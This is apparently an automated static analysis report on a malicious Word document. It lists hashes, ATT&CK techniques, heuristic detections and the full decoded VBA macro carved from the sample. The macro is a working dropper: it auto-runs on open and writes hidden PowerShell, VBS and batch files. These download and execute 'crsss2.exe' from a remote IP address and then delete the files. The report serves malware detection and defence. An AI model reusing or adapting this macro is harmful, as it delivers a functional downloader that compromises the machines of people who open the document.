Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d328ceac71beead3…

MALICIOUS

Office (OOXML)

46.3 KB Created: 2014-10-18 09:14:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2014-11-01
MD5: 4a132e0c7a110968d3aeac60c744b05a SHA-1: 03eb47faef6e629e500cb417c541c153f4a77b62 SHA-256: d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e
606 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document that uses a macro-enablement lure to prompt the user to enable content. The Auto_Open VBA macro then executes a PowerShell script that downloads a second-stage executable ('crsss2.exe') from 'http://162.243.234.167:8080/gr/4.exe'. The script also creates helper files 'ntusersc.ps1', 'ntusersss.bat', and 'ntuserskk.vbs' in the document's directory.

Heuristics 15

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 11 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        'Shell "cmd.exe /k " + MY_FILEDIR
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
        Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Print #FileNumber, "cmd.exe /c crsss2.exe;"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://162.243.234.167:8080/gr/4.exe Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4450 bytes
SHA-256: f27aad21fedd7e6047e843cecc03a2dd4e823f522f6a24a79c0c6b6539065846
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR
 MY_FILEN = "ntusersc.ps1"
 MY_FILE = "ntusersss.bat"
 MY_FIL = "ntuserskk.vbs"
     MY_FILENDIR = ActiveDocument.Path + "\ntusersc.ps1"
     MY_FILEDIR = ActiveDocument.Path + "\ntusersss.bat"
     MY_FILDIR = ActiveDocument.Path + "\ntuserskk.vbs"
     Dim FileNumber As Integer
     Dim FileNumb As Integer
     Dim FileNu As Integer
     Dim retVal As Variant
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile
    Open MY_FILENDIR For Output As #FileNumber
    Print #FileNumber, "$hashroot = '13-93-8e-e9-b1-a3-63-63-ed-49-7f-43-3d-5c-a2-c2';"
    Print #FileNumber, "$hash = '0';"
    Print #FileNumber, "$down = New-Object System.Net.WebClient;"
    Print #FileNumber, "$url  = 'http://162.243.234.167:8080/gr/4.exe';"
    Print #FileNumber, "$file = 'crsss2.exe';"
    Print #FileNumber, "$down.DownloadFile($url,$file);"
    Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
    Print #FileNumber, "$someFilePath = $ScriptDir + 'crsss2.exe';"
    Print #FileNumber, "$vbsFilePath = $ScriptDir + 'ntuserskk.vbs';"
    Print #FileNumber, "$batFilePath = $ScriptDir + 'ntusersss.bat';"
    Print #FileNumber, "$psFilePath = $ScriptDir + 'ntusersc.ps1';"
    Print #FileNumber, "Do { Start-Sleep -s 10;"
    Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"
    Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"
    Print #FileNumber, "Until ($hash -Match $hashroot);"
    Print #FileNumber, "cmd.exe /c crsss2.exe;"
    Print #FileNumber, "$file1 = gci $vbsFilePath -Force"
    Print #FileNumber, "$file2 = gci $batFilePath -Force"
    Print #FileNumber, "$file3 = gci $psFilePath -Force"
    Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden"
    Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden"
    Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden"
    Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
    Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
    Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
    Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
    Close #FileNumber
    
    Open MY_FILDIR For Output As #FileNumb
    Print #FileNumb, "currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
    Print #FileNumb, "Set objFSO=CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
    Print #FileNumb, "currentFile = currentDirectory & " & Chr(34) & "ntusersc.ps1" & Chr(34)
    Print #FileNumb, "Set objShell = CreateObject(" & Chr(34) & "Wscript.shell" & Chr(34) & ")"
    Print #FileNumb, "objShell.run " & Chr(34) & "powershell.exe -ExecutionPolicy bypass -noprofile -file " & Chr(34) & " & currentFile,0,true"
    Close #FileNumb
     
     'creat batch file
    Open MY_FILEDIR For Output As #FileNu
    Print #FileNu, "@echo off"
    Print #FileNu, "ping 1.1.2.2 -n 2"
    Print #FileNu, "cscript.exe " & ActiveDocument.Path & "\ntuserskk.vbs"
    Print #FileNu, "exit"
    Close #FileNu
        
    dir1 = Len(Dir(MY_FILENDIR))
    dir2 = Len(Dir(MY_FILEDIR))
    dir3 = Len(Dir(MY_FILDIR))
    SetAttr MY_FILENDIR, vbHidden
    SetAttr MY_FILEDIR, vbHidden
    SetAttr MY_FILDIR, vbHidden
    
    Do While dir1 = 0
    WaitFor (2)
    Loop
    
    Do While dir2 = 0
    WaitFor (2)
    Loop
    
    Do While dir3 = 0
    WaitFor (2)
    Loop
    
    'Shell "cmd.exe /k " + MY_FILEDIR
    
    retVal = Shell(MY_FILEDIR, 0)
    
    
     
End Sub
Sub WaitFor(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds

Do While Timer < SngSec
DoEvents
Loop

End Sub

Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: 106d8b3bff1540bd5076d9868a5bb2d9a43bddb0b1c776d96b15893df1610875
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.